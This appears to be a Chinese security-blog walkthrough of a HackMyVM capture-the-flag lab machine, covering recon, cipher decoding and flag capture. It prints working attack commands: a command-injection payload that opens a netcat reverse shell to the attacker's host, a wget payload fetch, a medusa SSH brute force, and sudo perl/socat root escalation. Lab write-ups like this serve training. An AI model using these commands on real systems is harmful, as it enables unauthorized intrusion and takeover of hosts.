官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
KALI攻击机地址:192.168.1.128
靶机地址:192.168.1.5
目标:root.txt和user.txt
nmap -A -p- 192.168.1.5
开启了22端口和80端口!!访问下80端口!!
漏洞利用阶段
再查看一下源代码:
这是一个格式,像是一个域名!!
上面那个图是猪圈密码的变种!
这里感谢:这位同学的技术支持!
密码表在下面!
根据密码表破解密码!!!
得出:SYSHIDDENHMV
根据源代码的格式修改密码:得出->sys.hidden.hmv
这里我们修改下kali的/etc/hosts下的文件:
访问下:我们看到第二关:
接着,我们坐下这个域名下的目录扫描:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/ -x txt,php,html,log,zip
第一个地址:
$ sudo apt-get install windows10 -y
好像没啥用!
第二个地址:
http://sys.hidden.hmv/members/
http://sys.hidden.hmv/members/7573185_0.webp
第三个地址:状态码是301,重定向,并且是白屏,下面应该还有东西!
接着下一重目录扫描!
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/weapon/ -x txt,php,html,log,zip
访问:这个地址,又是白屏!根据loot和tool推断有命令执行漏洞,我们FUZZ一下参数!
http://sys.hidden.hmv/weapon/loot.php
这里我们采用WFUZZ:
wfuzz -t 500 -c --hh=0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://sys.hidden.hmv/weapon/loot.php?FUZZ=id
我们这个wfuzz参数的意义:
-t N: Specify the number of concurrent connections (10 default)
指定并行链接的数量:
-c: Output with colors
输出信息带有颜色
--hh N[,N]+: Hide responses with the specified chars (Use BBB for taking values from baseline)
隐藏指定字符的响应信息
-w:指定字典
访问链接:http://sys.hidden.hmv/weapon/loot.php?hack=id
当前用户是www-data!
这里我们在命令执行中加入反弹bash的命令!并在kali上进行监听!
http://sys.hidden.hmv/weapon/loot.php?hack=nc 192.168.1.128 4444 -e /bin/bash
nc -lvvp 4444
-c shell commands:as `-e'; use /bin/sh to exec [dangerous!!]
-e filename :program to exec after connect [dangerous!!]
程序连接后执行命令!
这里反弹后的shell很多命令都不回显,所以我们搞个python的shell!
python3 -c 'import pty;pty.spawn("/bin/bash")'
权限提升阶段
我天,3重提权!!!
suid和sudo -l走起!!!
运行下,看看/usr/bin/perl -h
这个命令可以直接反弹到文件所属用户toreto账户的shell!而且不用密码!当然也没有密码!
大佬的提权WP:
翻一下:
如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!
sudo -u toreto /usr/bin/perl -e 'exec "/bin/sh";'
还有两个账户:
这里直接上传linpeas.sh文件!看看扫描下!
cd /tmp
wget http://192.168.1.128:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
这个东西有点意思,看看文件!
这是atenea账户的密码表吗?下载下来看看!
这里我们采用medusa进行暴力破解下!
medusa -h 192.168.1.5 -u atenea -P atenea.txt -M ssh -f -t 10 -O hidden.txt
破解成功:
User: atenea Password: sys8423hmv
SSH登录成功:
第一个flag:
cat user.txt
hmv{c4Hq**************pTL}
接下来,就需要提权到root了!
查一下sudo -l权限!!!
大佬的提权WP:
翻一下:如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!
我们先看下,这个命令有啥功能!
sudo -u root /usr/bin/socat stdin exec:/bin/sh
root的flag!!
hmv{2M*****************B6}
已在FreeBuf发表 0 篇文章
- 0 文章数
- 0 关注者